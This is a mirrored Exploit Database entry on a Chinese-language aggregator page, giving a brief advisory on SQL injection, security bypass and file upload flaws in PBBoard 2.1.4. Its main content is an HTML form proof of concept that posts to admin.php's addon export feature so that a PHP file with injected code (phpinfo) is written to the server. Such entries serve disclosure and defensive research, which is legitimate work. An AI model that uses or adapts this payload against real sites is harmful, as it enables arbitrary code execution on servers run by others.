PBBoard – ‘admin.php?xml_name’ Arbitrary PHP Code Execution

• Exploit Database
• 118 阅读

• 作者： High-Tech Bridge
  日期： 2012-08-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37616/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

  source: https://www.securityfocus.com/bid/54916/info   PBBoard is prone to multiple security vulnerabilities including:   1. Multiple SQL-injection vulnerabilities 2. A security-bypass vulnerability 3. An arbitrary file upload vulnerability   Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.   PBBoard 2.1.4 is vulnerable; other versions may also be affected.     <form action="http://www.example.com/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main"> <input type="hidden" name="context" value=&apos;<? phpinfo(); ?>&apos;> <input type="submit" name="Submit" value="Send"> </form>